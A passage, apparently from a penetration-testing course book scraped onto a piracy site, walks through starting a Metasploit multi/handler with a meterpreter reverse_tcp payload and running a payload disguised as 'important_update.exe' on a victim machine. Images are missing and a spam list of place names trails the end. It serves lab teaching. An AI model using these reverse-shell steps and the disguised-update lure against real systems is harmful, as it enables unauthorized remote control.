官术网_书友最值得收藏!

Starting the listener

First, we need to start our listener:

  1. Open Metasploit by typing msfconsole.
  2. Type use exploit/multi/handler.
  3. As stated before, we will be using meterpreter reverse_tcp payload. To set the payload, type the following:
 set payload windows /meterpreter/reverse_tcp

This module doesn't have any settings that we can touch by default, so we need to add a payload. This tells the module what sort of reverse shell we're listening for; it'll help manage it for us:

  • use exploit/multi/handler: handles the incoming connection
  • set payload windows/meterpreter/reverse_tcp: reverses the TCP payload
  • show options: shows the available options to set
  1. We also need to set up the LHOST and LPORT and make sure they're the same as the ones you set up in Step 3.

Then type Set lhost 192.168.10.50 Set lport 8080:

          Set lhost 192.168.10.50
          Set lport 8080
  1. Our handler is ready to receive the connection on port 8080.
  2. Type exploit to start the exploit.

Make sure that you transfer the important_update.exe file with the payload onto the victim computer the best way you can. Please contact your professor for assistance if needed.

Run the payload on the victim PC:

  1. Run the important-update on Server 2012:
  1. When you send the exploit to the victim, and the victim executes it, we get this:
  1. Type ? on the terminal to see the options available:
  1. Type sysinfo to make sure you can get information from the victim PC:
主站蜘蛛池模板: 星子县| 简阳市| 讷河市| 高邑县| 福建省| 响水县| 陵川县| 洛浦县| 深水埗区| 宁远县| 外汇| 汉阴县| 仁怀市| 滕州市| 岑巩县| 麻栗坡县| 北海市| 巴彦淖尔市| 邹平县| 胶南市| 汾西县| 珠海市| 涟水县| 博爱县| 泸水县| 苗栗县| 团风县| 双辽市| 平南县| 旬邑县| 萝北县| 黄陵县| 保亭| 内丘县| 大安市| 庆元县| 固镇县| 句容市| 钦州市| 山阴县| 阿克苏市|